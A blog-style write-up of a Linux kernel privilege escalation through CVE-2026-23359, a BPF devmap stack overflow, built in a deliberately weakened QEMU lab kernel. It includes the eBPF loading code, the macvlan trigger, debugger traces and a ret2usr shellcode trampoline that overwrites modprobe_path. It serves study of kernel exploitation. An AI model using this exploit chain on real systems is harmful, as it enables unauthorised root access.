⍉ CVE-2026-23359

# recommended listening - irohasasaki - meltdown
aka: They Call Me 007 - 0 Hours Spent Pwning, 0 Hours Spent Thinking, 7 Years Spent Compiling The Linux Kernel; or Valarante Child Game; or Please Bro Just One More Kernel Config Bro Please; or Five Hundred Thousand Dollars at The Next Pwn2Own; or I Know I'm A Chopped Undergrad Okay Leave Me Alone

introduction

A full modprobe_path overwrite. No privileges. No dependencies. Just 455 kb. The consequences? Full local privilege escalation on any Linux device.

Haha nah, just fucking with you. This article was written fully by me, a human. A while ago I'd read a lovely post from my dear friend June about exploiting a CVE in Python. I was a little pissed off reading this post, because I like doing some Python pwn stuff every now and again, and I don't know why the idea of exploiting an actual real-life bug (as compared to a nonsense CTF vulnerability) never occurred to me. I guess I literally just forgot that bugs are real and you can do things with them. I am like a little brainrotted baby who can only think in terms of Challenges and Points and Scoreboards.

To graduate from CTF and enter the big, real world of Being Employable, I decided to try my hand at doing the same thing. I chose not to exploit a Python bug, because (no offense to June) Python bugs are kind of meaningless due to the existence of __import__('os').system('sh'). Like, the shell is already there. We merely choose to arrive at a shell in this roundabout manner because it is fun and educational to understand how these systems work. However, pure educational value isn't what I wanted. No, no, no. I wanted a real Big Boy Bug for real Big Boys (that's me), with real-world implications. I wanted a system that is meaningful to attack, something useful for a change! Not these heap pwn notepad CRUD apps that no one has actually written since 1980. That's right. We're attacking...

The Linux kernel

Ok, first things first, I wasn't going to find a zero-day in the Linux kernel. That's psychotic. I'm not Orange Tsai. My plan was to carefully choose a simple, easy-to-exploit and high-severity CVE in Linux that involved a subsystem I understood well enough. This required a fair bit of thought, and I ended up scrolling a few pages back in Linux's CVE announcement mailing list to find something useful. Eventually, I landed on the target of tihs post, CVE-2026-23359. The description for it is as follows.


bpf: Fix stack-out-of-bounds write in devmap

get_upper_ifindexes() iterates over all upper devices and writes their
indices into an array without checking bounds.

Also the callers assume that the max number of upper devices is
MAX_NEST_DEV and allocate excluded_devices[1+MAX_NEST_DEV] on the stack,
but that assumption is not correct and the number of upper devices could
be larger than MAX_NEST_DEV (e.g., many macvlans), causing a
stack-out-of-bounds write.

Add a max parameter to get_upper_ifindexes() to avoid the issue.
When there are too many upper devices, return -EOVERFLOW and abort the
redirect.

To reproduce, create more than MAX_NEST_DEV(8) macvlans on a device with
an XDP program attached using BPF_F_BROADCAST | BPF_F_EXCLUDE_INGRESS.
Then send a packet to the device to trigger the XDP redirect path.

The Linux kernel CVE team has assigned CVE-2026-23359 to this issue.
      

I felt very lucky finding this! A stack OOB is like, a baby vulnerability for babies. Additionally, it dealt with a subsystem I was somewhat familiar with, which is eBPF and XDP. Furthermore, it had very clear reproduction details. Awesome! Very cool. I spent some time carefully understanding the anatomy of the bug, and I was relieved to find that it was, indeed, easy breezy.

As I will detail in the following sections, the setup for this bug is decidedly nontrivial, and understanding each part of it even more so. During my own exploitation, because I am a zoomer with no attention span, I simply asked an LLM to generate most of the setup for me such that I could work on the actual relevant kpwn techniques. This was a good decision which probably saved me around a week of effort and boredom; I felt it was wise to ensure that the bug could at least cause a kernel panic before I devoted too much time to a potentially fruitless endeavour.

I bring this up in service of a small point: it is very much possible to understand the exploitation work without fully understanding every detail of every system at play here - this is what I managed to do, initially. I have, however, done my due diligence in ensuring that I properly understood each aspect of the bug, from cause to effect, such that I could accurately document it for my esteemed blog with thousands of fans and readers and RSS subscribers. I only do the best for my adoring readers.

So, this writeup will go into what might be deemed more detail than necessary. Feel free to skip around, I am sure that not all of this is interesting, lmfao (to be honest I think the actual pwn is VERY lame). Anyways let us begin with some light background.

eBPF and XDP

eBPF is, essentially, a subsystem of Linux that allows for users to load and run programs within kernelspace. Instead of having to load a kernel module, a user is simply able to create a program in eBPF and extend certain functionalities of the Linux kernel at runtime. It is honestly a very neat piece of work! There are a lot of things that eBPF programs can be used for, the most interesting one to me being rootkit capabilities (I'm an information security student, after all). eBPF has its own instruction set architecture and functions, all of which are highly interesting - too interesting to actually talk about here.

For our purposes, we are interested in eBPF's capabilities with regards to networking, which is where XDP (eXpress Data Path) comes into play. XDP deals with network packets before the kernel's own networking stack interacts with them. A program that utilises XDP might be used for networking systems that demand a lot of efficiency - for example, DDOS protection or load balancing. The Linux kernel's networking code has a lot of overhead, so XDP allows us to skip past it and deal with packets quicker. We do this by registering an eBPF program and attaching it to a network interface. These network interfaces can be physical interfaces on our machine's NIC, or they can be virtual network devices we can create from userspace.

There are two important details regarding virtual network devices. Firstly, when we create a virtual network device, the kernel assigns it an ifindex from a monotonically increasing global counter. Secondly, some network devices can be 'attached' or placed on top of other network devices. As we will see in the exploit later on, the device we attach the BPF program to will be a veth, and the devices we place on top (which trigger the bug) will be several macvlans.

That is enough background for us to get started.

Studying the bug

I first picked an affected Linux kernel version randomly, 6.19.7. I cloned the repository (which took around 30 minutes, lmfao) and reverted to the change just before the fix. The patch simply adds bounds checks to a function get_upper_ifindexes().

-static int get_upper_ifindexes(struct net_device *dev, int *indexes)
+static int get_upper_ifindexes(struct net_device *dev, int *indexes, int max)
 {
        struct net_device *upper;
        struct list_head *iter;
        int n = 0;

        netdev_for_each_upper_dev_rcu(dev, upper, iter) {
+               if (n >= max)
+                       return -EOVERFLOW;
                indexes[n++] = upper->ifindex;
        }
+
        return n;
 }

get_upper_ifindexes() is called by dev_map_redirect_multi(), which is actually our function of concern here.

    23   int dev_map_redirect_multi(struct net_device *dev, struct sk_buff *skb,
    22   │       >       >          const struct bpf_prog *xdp_prog,
    21   │       >       >          struct bpf_map *map, bool exclude_ingress)
    20   {
    19   │       struct bpf_dtab *dtab = container_of(map, struct bpf_dtab, map);
    18   │       struct bpf_dtab_netdev *dst, *last_dst = NULL;
    17   │       int excluded_devices[1+MAX_NEST_DEV];
    16   │       struct hlist_head *head;
    15   │       struct hlist_node *next;
    14   │       int num_excluded = 0;
    13   │       unsigned int i;
    12   │       int err;
    11   │
    10   │       if (exclude_ingress) {
     9   │       │       num_excluded = get_upper_ifindexes(dev, excluded_devices);
     8   │       │       excluded_devices[num_excluded++] = dev->ifindex;
     7   │       }

Essentially, when a packet is received on an interface, any XDP program attached to that interface will fire. If the program calls BPF_REDIRECT_MAP(devmap) (a function which redirects the packets to each device on a devmap), the function above (dev_map_redirect_multi()) is eventually called. dev_map_redirect_multi() allocates a buffer on the stack and stores each 'upper' device's ifindex within that buffer. The vulnerablity is that the function assumes there can only be a maximum of 8 upper devices attached to our interface, which is wrong. We can, in fact, make an arbitrary amount of devices. This results in our OOB write on the stack.

Let us introduce more detail. Specifically, our exploit path here is to create a target interface (in this case, a veth interface) and attach an XDP program to that interface which calls BPF_REDIRECT_MAP(). We then add many upper devices (in this case, macvlan devices). After sending a packet to that veth interface, the XDP program will fire and the dev_map_redirect_multi() call will iterate through the number of attached devices to our veth interface, hence causing our OOB write on the stack.

A lot of different things to get started with here. Let's first get started with compiling our vulnerable version of the Linux kernel.

Compilation

As stated above, I'd already cloned the Linux repository to diff the patches against the previously vulnerable version. Due to how great Linux engineers are, compiling the kernel is a very simple task that requires only a handful of commands. We first need to configure the kernel to support the features we want. We'll start with the obvious (networking, BPF, XDP), as well as some baseline requirements like supporting a tty for qemu. We can do this with the wonderful make menuconfig command.

 .config - Linux/x86 6.19.6 Kernel Configuration
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
  ┌────────────────────────────── Linux/x86 6.19.6 Kernel Configuration ──────────────────────────────
    Arrow keys navigate the menu.  <Enter> selects submenus ---> (or empty submenus ----).           │  
    Highlighted letters are hotkeys.  Pressing <Y> includes, <N> excludes, <M> modularizes features. │  
    Press <Esc><Esc> to exit, <?> for Help, </> for Search.  Legend: [*] built-in  [ ] excluded      │  
    <M> module  < > module capable                                                                   │  
   ┌───────────────────────────────────────────────────────────────────────────────────────────────  
      General setup  --->                                                              
   │            [ ] 64-bit kernel                                                                    
  Processor type and features  --->                                                
   │            [ ] Mitigations for CPU vulnerabilities  ----                                        
  Power management and ACPI options  --->                                          
  Bus options (PCI etc.)  --->                                                     
  Binary Emulations  ----                                                          
   │            [ ] Virtualization  ----                                                             
  General architecture-dependent options  --->                                     
   │            [ ] Enable loadable module support  ----                                             
   │            [ ] Enable the block layer  ----                                                     
  Executable file formats  --->                                                    
   │                Memory Management options  --->                                                  
   │            [ ] Networking support  ----                                                         
  ────────────↓(+)───────────────────────────────────────────────────────────────────────────────┘  
  ├───────────────────────────────────────────────────────────────────────────────────────────────────  
                       <Select>    < Exit >    < Help >    < Save >    < Load >                      │  
  ───────────────────────────────────────────────────────────────────────────────────────────────────┘  
                                                                                                         

This wonderful TUI allows us to configure the Linux kernel easily, starting with a (somewhat) minimal configuration of Linux. After running make -j8 bzImage vmlinux however, I found that it was far too slow on my shitty $400 laptop, with the compilation times taking around 30 minutes. A lot of this is precious power wasted on compiling drivers for shit like AMD chips and temperature sensors. No thanks!

Alternatively, we can see that the CVE announcement itself has its own bzImage and vmlinux QEMU image attached. I did try working with these, but they were just more of a headache - I think these files are meant to be integrated into some sort of syzkaller workflow. They have kASAN enabled by default, which... well, if we're doing exploitation work, we don't want that. So that was also a bust. (I would like to try using these tools at some point...)

Instead, we have to go even more minimal. We can do this by running make tinyconfig, which configures the smallest kernel possible, with only the bare necessities. Then, we can write a script to add all the additional configurations we need on top of that. We will start with the features discussed earlier.

  34   #!/bin/bash
  33   cat >>.config <<'EOF'
  32   CONFIG_BLK_DEV_INITRD=y
  31   CONFIG_RD_GZIP=y
  30   CONFIG_TTY=y
  29   CONFIG_SERIAL_8250=y
  28   CONFIG_SERIAL_8250_CONSOLE=y
  27   CONFIG_BLK_DEV=y
  26   CONFIG_ATA=y
  25   CONFIG_ATA_PIIX=y
  24   CONFIG_BLK_DEV_SD=y
  23   CONFIG_KALLSYMS=y
  22   CONFIG_KALLSYMS_ALL=y
  21   CONFIG_NET=y
  20   CONFIG_UNIX=y
  19   CONFIG_INET=y
  18   CONFIG_TUN=y
  17   CONFIG_PACKET=y
  16   CONFIG_NETDEVICES=y
  15   CONFIG_NET_CORE=y
  14   CONFIG_DUMMY=y
  13   CONFIG_MACVLAN=y
  12   CONFIG_VETH=y
  11   CONFIG_BPF=y
  10   CONFIG_BPF_FS=y
   9   CONFIG_BPF_SYSCALL=y
   8   CONFIG_DEBUG_INFO=y
   7   CONFIG_DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT=y
   6   CONFIG_DEBUG_INFO_BTF=y
   5   CONFIG_BPF_JIT=y
   4   CONFIG_GENERIC_XDP=y
   3   CONFIG_XDP_SOCKETS=y
   2   EOF

Going through it, this seems like a good list. We have tty support, every networking thing we need for our exploit, and eBPF and XDP support. If we ever need anything, we'll just add it. This really reduces our compile time to something a lot more reasonable.

To run this, I just stole a few files from a kpwn challenge I had on hand. I won't go into the specifics of the setup because there are other great resources for that which I copied, and I do expect the audience of this post to be, like, people who already know what initramfs is.

Anyways, this works nicely. Running this in qemu, we can verify that the setup works...

SeaBIOS (version 1.16.3-debian-1.16.3-2)


iPXE (https://ipxe.org) 00:03.0 CA00 PCI2.10 PnP PMM+1EFC6D30+1EF06D30 CA00

Booting from ROM..
Failed to execute /init (error -8)
Starting init: /bin/sh exists but couldn't execute it (error -8)
Kernel panic - not syncing: No working init found.  Try passing init= option to kernel. See Linux Documentation/admin-guide/init.rst fo.
Kernel Offset: disabled
Rebooting in 1 seconds..

Glup???

So, uh, this is because being able to run ELF files like busybox and shell scripts are kernel configurations that tinyconfig doesn't include. Jeez! They weren't kidding about it being minimal. But, quickly enabling that and recompiling the kernel...

mount: mounting devtmpfs on /dev failed: Resource busy
/bin/sh: can't access tty; job control turned off
/ # ls -alps
total 21372
     0 drwxrwxr-x   12 0        0                0 May 27 21:04 ./
     0 drwxrwxr-x   12 0        0                0 May 27 21:04 ../
     4 -rw-------    1 0        0                9 May 27 21:04 .ash_history
     0 drwxr-xr-x    2 0        0                0 May 27 21:04 bin/
     0 drwxr-xr-x    3 0        0                0 May 27 21:04 dev/
     0 drwxr-xr-x    3 0        0                0 May 20 20:16 etc/
     0 lrwxrwxrwx    1 0        0               11 Dec 11  2020 init -> bin/busybox
  3584 -rw-rw-r--    1 0        0          3670016 May 27 21:04 initramfs.cpio.gz
     0 lrwxrwxrwx    1 0        0               12 May 27 21:04 linuxrc -> /bin/busybox
     0 dr-xr-xr-x   64 0        0                0 May 27 21:04 proc/
     0 drwxr-xr-x    2 0        0                0 Dec 11  2020 root/
     0 drwxr-xr-x    2 0        0                0 May 27 21:04 sbin/
     0 drwxr-xr-x    2 0        0                0 May 27 21:04 tmp/

Ok awesome. Surely, that's not going to happen again, and we can finally move on with the actual interesting exploitation work!

Writing eBPF

First note: wow, doing this is a huge fucking pain! I'm going to handwave over all the agonising here, but rest assured that trying to do something so simple as make a statically compiled program that does what we need is really very terrible! I think you're really not supposed to be able to do this on a minimal system with no libraries from userspace or something - that, or I've missed something embarrassingly obvious. Kubernetes does this! At large scales! What are the Kubernetes people doing that I'm missing? (probably shipping libraries with their images, which I can't do, lmao)

The approach I wanted to take here (which didn't end up panning out) is to use the wonderful libbpf library to import compiled eBPF bytecode. It's very useful, we don't even need to manually create our devmaps if we use it. However, I must have blasphemed God in my last post or something, and He immediately struck me down for daring to want convenience in this manner. After pages and pages of this sort of terminal output:

/usr/bin/ld: (.text+0x600e): undefined reference to `elf_begin'
/usr/bin/ld: (.text+0x602a): undefined reference to `gelf_getehdr'
/usr/bin/ld: (.text+0x6040): undefined reference to `elf_getshdrstrndx'
/usr/bin/ld: (.text+0x6058): undefined reference to `elf_getscn'
/usr/bin/ld: (.text+0x6062): undefined reference to `elf_rawdata'
/usr/bin/ld: (.text+0x60b6): undefined reference to `elf_getdata'
/usr/bin/ld: (.text+0x60cd): undefined reference to `elf_nextscn'

I figured I'd just cut my losses.

Second note: this section is super boring! Like, really! I can't imagine you would care about this part, please feel free to skip it! Serious!

Our eBPF program needs to fulfill three requirements such that the exploit path will trigger (indeed, these are covered in the Linux advisory above).

  1. A devmap needs to be created.
  2. The program needs to call BPF_REDIRECT_MAP.
  3. The program needs to set the BPF_F_BROADCAST | BPF_F_EXCLUDE_INGRESS flags.

We can start with the devmap. There are two ways to create this - with bpftool, or directly, using syscalls from the exploit program itself. After a bit of time trying to wrangle a statically compiled version of bpftool, fighting with version mismatches and whatnot, I gave up and figured the other option was better.

   11      union bpf_attr map_attr = {
   10        .map_type    = BPF_MAP_TYPE_DEVMAP,
    9        .key_size    = 4,
    8        .value_size  = 4,
    7        .max_entries = 1
    6     };
    5     strncpy(map_attr.map_name, "devmap", BPF_OBJ_NAME_LEN);
    4     int map_fd = bpf(BPF_MAP_CREATE, &map_attr, sizeof(map_attr));
    2     printf("[+] devmap fd=%d\n", map_fd);

The file descriptor returned now points to our devmap. Note that bpf() is a helper function defined here:

    5   static int bpf(int cmd, union bpf_attr *attr, unsigned int size) {
    4   │   return syscall(__NR_bpf, cmd, attr, size);
    3   }

Afterwards, it's time to handwrite some eBPF bytecode I guess. We can make this a bit easier for ourselves by writing the eBPF program in C first (on our host machine, where we have access to wonderful libraries), compiling it, and then putting the bytecode into our exploit program).

   1   #include <linux/bpf.h>
   1   #include <bpf/bpf_helpers.h>
   2   
   3   struct {
   4   │   __uint(type, BPF_MAP_TYPE_DEVMAP);
   5   │   __uint(key_size, 4);
   6   │   __uint(value_size, 4);
   7   │   __uint(max_entries, 16);
   8   } devmap SEC(".maps");
   9   
  10   SEC("xdp")
  11   int xdp_redirect_broadcast(struct xdp_md *ctx)
  12   {
  13   │   return bpf_redirect_map(&devmap, 0, BPF_F_BROADCAST | BPF_F_EXCLUDE_INGRESS);
  14   }
  15   
  16   char _license[] SEC("license") = "GPL";

We can observe the compiled bytecode using llvm-objdump.

  wax@kalmia  ~/work/kpwn/poc/initramfs  llvm-objdump -d xdp_exploit.o

xdp_exploit.o:  file format elf64-bpf

Disassembly of section xdp:

0000000000000000 <xdp_redirect_broadcast>:
       0:       18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 r1 = 0x0 ll
       2:       b7 02 00 00 00 00 00 00 r2 = 0x0
       3:       b7 03 00 00 18 00 00 00 r3 = 0x18
       4:       85 00 00 00 33 00 00 00 call 0x33
       5:       95 00 00 00 00 00 00 00 exit

The compiled object file naturally has ELF headers alongside the important bytecode. We just isolate the bytecode with llvm-objcopy and use my beloved xxd -i to generate a header file that imports the bytestring into our program.

   15   │  *(uint32_t *)(xdp_bin + 1) = 0x11; // manual bytepatch #lmfao
   14   │  *(uint32_t *)(xdp_bin + 4) = (uint32_t)map_fd;
   13   │ 
   12   │  union bpf_attr prog_attr = {
   11   │     .prog_type = BPF_PROG_TYPE_XDP,
   10   │     .insns     = (unsigned long)xdp_bin,
    9   │     .insn_cnt  = 6,
    8   │     .license   = (unsigned long)"GPL",
    7   │     .log_buf   = (unsigned long)log_buf,
    6   │     .log_size  = sizeof(log_buf),
    5   │     .log_level = 1,
    4   │  };
    3   │ 
    2   │  strncpy(prog_attr.prog_name, "xdp_program", BPF_OBJ_NAME_LEN);
    1   │  int prog_fd = bpf(BPF_PROG_LOAD, &prog_attr, sizeof(prog_attr));
  200     if (prog_fd < 0) {
    1   │     fprintf(stderr, "BPF_PROG_LOAD failed: %s\n%s\n", strerror(errno), log_buf);
    2   │     return 1;
    3   │  }
    4   │  printf("[+] prog fd=%d\n", prog_fd);

Then, we need to actually attach this XDP program to our interface. Once again, because God hates me, we are unable to use any of the convenient tooling. There are two programs people typically use - iproute2, which is the builtin ip program from busybox - this doesn't work, for some reason. The command just doesn't get recognized. And xdp-loader, which I can't statically compile for the same reasons I can't statically compile my exploit binary. We can just do this with BPF syscalls manually again, through BPF_LINK_CREATE, as stated in the documentation for it, here.

   17   void attach_xdp(unsigned int ifindex, int prog_fd) {
       16   │   union bpf_attr attr = {
       15   │     .link_create = {
       14   │       .prog_fd     = prog_fd,
       13   │       .target_ifindex = ifindex,
       12   │       .attach_type = BPF_XDP,
       11   │       .flags       = XDP_FLAGS_SKB_MODE,
       10   │    }
        9   │  };
        8   │ 
        7   │  int link_fd = bpf(BPF_LINK_CREATE, &attr, sizeof(attr));
        6   │  if (link_fd < 0) {
        5   │     perror("BPF_LINK_CREATE");
        4   │     exit(1);
        3   │  }
        2   │  printf("[+] link_fd=%d\n", link_fd);
        1   }
    

Yay! I think for the most part, that's it. When we run our program and send a packet, the XDP flow should get triggered. Let's test it out by attaching a debugger to qemu and breakpointing at dev_map_redirect_multi().

--------------------------------------------------------------------- source: kernel/bpf/devmap.c+728 ----
    723                            const struct bpf_prog *xdp_prog,
    724                            struct bpf_map *map, bool exclude_ingress)
*   725   {
    726         struct bpf_dtab *dtab = container_of(map, struct bpf_dtab, map);
    727         struct bpf_dtab_netdev *dst, *last_dst = NULL;
           // excluded_devices = 0xffffc90000003c2c  ->  0x0000000effff8880
 -> 728         int excluded_devices[1+MAX_NEST_DEV];
    729         struct hlist_head *head;
    730         struct hlist_node *next;
    731         int num_excluded = 0;
    732         unsigned int i;
    733         int err;
--------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1] stopped at 0xffffffff812d46c9 <dev_map_redirect_multi+0x19>, reason: SINGLE STEP
----------------------------------------------------------------------------------------------- trace ----
[*#0] 0xffffffff812d46c9 <dev_map_redirect_multi+0x19>
[ #1] 0xffffffff8144b47d <xdp_do_generic_redirect+0x10d> (frame name: xdp_do_generic_redirect_map)
[ #2] 0xffffffff8142760a <do_xdp_generic+0x1aa>
[ #3] 0xffffffff81427793 <__netif_receive_skb_core.constprop.0+0x133> (frame name: __netif_receive_skb_co)

Wow! That was all the tedious, boring shit done. Now, we can finally pwn! I sure hope this pwn goes into some super interesting primitives and ideas and isn't just a straightforward ret2usr! It would be a shame if that was all this ended up being, after all the work we took to get here!

Haha yeah it really is that lame

Remember that our trigger for the bug is adding a bunch of macvlans. We can rewrite the exploit to just run that in a loop about, 0x10 or so times.

    2   void create_macvlan() {
    3   │ char cmd[128];
    4   │ snprintf(cmd, sizeof(cmd), "ip link add macvlan%d link faceoffs type macvlan mode bridge", gmc);
    5   │ system(cmd);
    6   │ snprintf(cmd, sizeof(cmd), "ip link set macvlan%d up", gmc);
    7   │ gmc++;
    8   │ system(cmd);
    9   }

Stepping through the loop in the debugger where the stack buffer gets populated, we can compare and contrast how the return address + stack cookie gets whacked.

gef> x/16g $rsp - 0x8
0xffffc90000003c10:     0xffffffffc0000056      0xffff888000da7800
0xffffc90000003c20:     0xffffc90000005000      0x2014958
0xffffc90000003c30:     0x0     0x0
0xffffc90000003c40:     0x0     0x0
0xffffc90000003c50:     0xffffc90000003d98      0xffffc90000005000
0xffffc90000003c60:     0x0     0xffffc90000003c88
0xffffc90000003c70:     0xe     0xffff888000da7800
0xffffc90000003c80:     0xffffffff8142760a      0xffff888002014902
gef> 

The return address is at 0xc80, so we should expect to see the stack cookie either before it, or before some other stored registers on the stack. So, uh... where is it? It should be a clearly randomised, null-terminated string. Erm....

Turns out, stack cookie support is another kernel configuration. Glup! It's CONFIG_STACKPROTECTOR=y, which is not included in make tinyconfig. Oops! However, since this exploit turns out to be a direct buffer overflow, we have no way of exploiting the program anyway if stack cookies are enabled. We view this as one of God's limited blessings and press on.

You ever think like, Americans probably call it a stack burger or something? Mm, burger... Imagine a burger... that'd be awesome...

After stepping through the code a little bit - specifically, zooming past the if (exclude_ingress) check, we can view our stack again and see that the values have been clobbered.

    0xffffffff812d4715 0f83c9000000          <dev_map_redirect_multi+0x65>   jae    0xffffffff812d47e4 <dev_map>
--------------------------------------------------------------------------- source: kernel/bpf/devmap.c+740 ----
    735         if (exclude_ingress) {
    736                 num_excluded = get_upper_ifindexes(dev, excluded_devices);
    737                 excluded_devices[num_excluded++] = dev->ifindex;
    738         }
    739   
 -> 740         if (map->map_type == BPF_MAP_TYPE_DEVMAP) {
    741                 for (i = 0; i < map->max_entries; i++) {
    742                         dst = rcu_dereference_check(dtab->netdev_map[i],
    743                                                     rcu_read_lock_bh_held());
    744                         if (!dst)
    745                                 continue;
--------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1] stopped at 0xffffffff812d4706 <dev_map_redirect_multi+0x56>, reason: SINGLE STEP
----------------------------------------------------------------------------------------------------- trace ----
[*#0] 0xffffffff812d4706 <dev_map_redirect_multi+0x56>
[ #1] 0x000000050000001b <NO_SYMBOL>
[ #2] 0xffff888002014902 <NO_SYMBOL>
[ #3] 0xffff888002014958 <NO_SYMBOL>
[ #4] 0xffff888002014902 <NO_SYMBOL>
[ #5] 0xffff888002014800 <NO_SYMBOL>
[ #6] 0xffff888000bfd6c0 <NO_SYMBOL>
[ #7] 0x0000000000000000 <NO_SYMBOL>
----------------------------------------------------------------------------------------------------------------
gef> x/16g $rsp - 0x8
0xffffc90000003c10:     0xffffffff812d46f5      0xffff888000da7800
0xffffc90000003c20:     0xffffc90000005000      0x602014958
0xffffc90000003c30:     0x800000007     0xa00000009
0xffffc90000003c40:     0xc0000000b     0xe0000000d
0xffffc90000003c50:     0x100000000f    0x1200000011
0xffffc90000003c60:     0x1400000013    0x1600000015
0xffffc90000003c70:     0x1800000017    0x1a00000019
0xffffc90000003c80:     0x50000001b     0xffff888002014902
gef> 

The buffer stores all these ifindex values, which are ints (32-bit). We can see once again at 0x80, it just so happens that our 64-bit return address is written in two places - the high bits are overwritten with 0x5, and the low bits are written with 0x1b. Therefore, our arbitrary write to the stack is not exactly arbitrary - it is reliant on the macvlan's ifindex values. I am quite certain that these are assigned via auto-increment, and it is impossible to alter an ifindex directly. The only way to set a device's ifindex to, say, 0x1000, is to create 0x1000 devices.

Clearly, this becomes implausible to partially overwrite any useful, high values to the return address. (Note that we wouldn't have a KASLR leak in the first place to know what to overwrite to anyway). So, what can we do with this primitive?

Cheating

We just disable SMAP and SMEP and mmap a page at whatever value we're actually able to overwrite the return address to. In this case, we're able to overwrite to 0x50000000, so... just...

   11   void initialise_ret2usr_mmap() {
   10   │ puts("[!] initialising...");
    9   │ chain = mmap((void*)MMAPPED_PAGE, 0x2000,-
    8   │                   PROT_READ|PROT_WRITE|PROT_EXEC,-
    7   │                   MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,-
    6   │                   -1, 0);
    5   │ memcpy(chain, (void*)&trampoline, 0x1000);
    4   │ chain[0x0] = (unsigned long)&exit_safely;
    3   │ puts("[!] wrote trampoline");
    2   }

I'm really good at this kernel pwn stuff. Yeah so I really don't know if this is exploitable with full protections (I really believe it is not, I couldn't do it, but also I'm dogshit). SMEP and SMAP are basically always enabled on Linux machines, as far as I'm aware? So, rapidly, the usefulness of this exploit is greatly dwindling, and the Zero Day Initiative are going to point and laugh at me and call me a chopped loser... (Note that this exploit was already useless once we had to disable stack cookies).

Wrapping up (actual privesc)

Anyways now we can just dump whatever shellcode we want in our mmap'd page and it will get executed in kernel mode. Hooray! At this point you can either call commit_creds or do modprobe_path overwrite. I think modprobe_path is easily the most aura, so we will do that. I wrote this part in asm because I'm chopped. We need a kASLR leak first, and specifically, one that's within the .text section. When inspecting the registers in a debugger, all the kernelspace addresses were in the stack, which I didn't like. So, instead, I chose to dereference a return address in a later stack frame through rsp. I think this is a simple enough idea and doesn't deserve much belaboring...

    0x500000053 90                    <NO_SYMBOL>   nop
    0x500000054 48c7c74e8f6900        <NO_SYMBOL>   mov    rdi, 0x698f4e
 -> 0x50000005b 4c8b942470010000      <NO_SYMBOL>   mov    r10, QWORD PTR [rsp + 0x170]
    0x500000063 4901fa                <NO_SYMBOL>   add    r10, rdi
    0x500000066 48bf2f746d702f610000  <NO_SYMBOL>   movabs rdi, 0x612f706d742f
    0x500000070 49893a                <NO_SYMBOL>   mov    QWORD PTR [r10], rdi
    0x500000073 0f01f8                <NO_SYMBOL>   swapgs
    0x500000076 48a1707b4b0000000000  <NO_SYMBOL>   movabs rax, ds:0x4b7b70
------------------------------------------------------------------------------------------------------------ mem
ory access: $rsp+0x170 = 0xffffc90000003df8 ----
      0xffffc90000003df8|+0x0000|+000: 0xffffffff81415472 <skb_release_data+0xb2>  ->  0x5c415d5b7f766380
      0xffffc90000003e00|+0x0008|+001: 0xffffffff813218b6 <slab_free.isra+0x16>  ->  0x3950578b3174c084
      0xffffc90000003e08|+0x0010|+002: 0xffff888002009700  ->  0x0000000000000000
      0xffffc90000003e10|+0x0018|+003: 0xffff888000cdd000  ->  0x00000001010a81a0
----------------------------------------------------------------------------------------------------------------
----------------------------------- threads ----
[*Thread Id:1, tid:1] stopped at 0x000000050000005b <NO_SYMBOL>, reason: SINGLE STEP
----------------------------------------------------------------------------------------------------------------
------------------------------------- trace ----
[*#0] 0x000000050000005b <NO_SYMBOL>
[ #1] 0xffff888002010102 <NO_SYMBOL>
[ #2] 0xffff88800201015c <NO_SYMBOL>
[ #3] 0xffff888002010102 <NO_SYMBOL>
[ #4] 0xffff888002010000 <NO_SYMBOL>
[ #5] 0xffff888000c0b6c0 <NO_SYMBOL>

At [rsp + 0x170] there's a kernel .text address, so we can just add the offset to modprobe_path. Let's find where that is by reading /proc/kallsyms. (Sidenote: there's not always a .text address here, - we are scanning a different stack frame, after all. I think real software engineers call this 'undefined behavior'.)

/ # cat /proc/kallsyms
cat: can't open '/proc/kallsyms': No such file or directory
/ # ls /proc

Glup????????

So, not only is procfs a separate config CONFIG_PROC_FS, so is /proc/kallsyms (CONFIG_KALLSYMS). Oops... This is really annoying, but I think this will be the last time this happens, right? Whatever...

/ # cat /proc/kallsyms | grep dev_map_redirect_multi
ffffffff812cea50 T dev_map_redirect_multi
/ # cat /proc/kallsyms | grep modprobe
/ # 

Ok, ok, fine. Modules and modprobe_path are another configuration CONFIG_MODULES. To be honest that one's fine, that one's my bad, seriously. Good thing the exploit still works, though. It would be a huge embarrassment if I missed out on some configuration that would completely brick the exploit... Fixing that up, we can finally obtain our offsets and run the exploit properly.

Here's the exploit shellcode. It is very standard - note that at the beginning of the program, we do all the necessary work of saving userland's csgsfs flags somewhere already. We just take this shellcode afterwards and chuck it into the mmap'd page.

   28   volatile void trampoline() {
   27   │ __asm__(
   26   │    ".fill 0x50, 0x01, 0x90\n"
   25   │    "mov rdi, 0x698f4e\n" // modprobe path offset
   24   │    "mov r10, qword ptr [rsp + 0x170]\n" // kaslr leak
   23   │    "add r10, rdi\n"
   22   │    "mov rdi, 0x612f706d742f\n"
   21   │    "mov qword ptr [r10], rdi\n"
   20   │    "swapgs\n"
   19   │    "movabs rax, user_ss\n"
   18   │    "push rax\n"
   17   │    "movabs rax, user_sp\n"
   16   │    "push rax\n"
   15   │    "movabs rax, user_rflags\n"
   14   │    "push rax\n"
   13   │    "movabs rax, user_cs\n"
   12   │    "push rax\n"
   11   │    "mov rax, 0x500000000\n"
   10   │    "mov rdx, qword ptr [rax]\n"
    9   │    "push rdx\n"
    8   │    "iretq\n"
    7   │ );
    6   }

Now, everything works nicely :)


/ # ./exploit
hello vro
[!] initialising...
[!] wrote trampoline
[+] devmap fd=3
[+] prog fd=4
[!] creating macvlans
[+] link_fd=5
[+] sleeping for 3 seconds to wait for modprobe overwrite
BUG: scheduling while atomic: kworker/0:0/6/0x00000101
[!] modprobe path > /tmp/a
      

As an aside, for some reason I really like the LLM-ism of having cute little '[+]' and '[!]' symbols next to your exploit code, so I just started doing it myself. Some of the LPEs that have released lately have such cool terminal output, especially the CopyFail-esque stuff where the stale page bytes are pretty-printed in real time as they're overwritten. It's so aura... I wish I could do something similar, but this particular exploit doesn't lend itself well to a graphic presentation.

Also, note that BUG: scheduling while atomic. Uhh, I have no idea why this happens, lol! It doesn't break the exploit and I don't care to find out at this juncture. Maybe someone smarter can figure that out.

Final steps

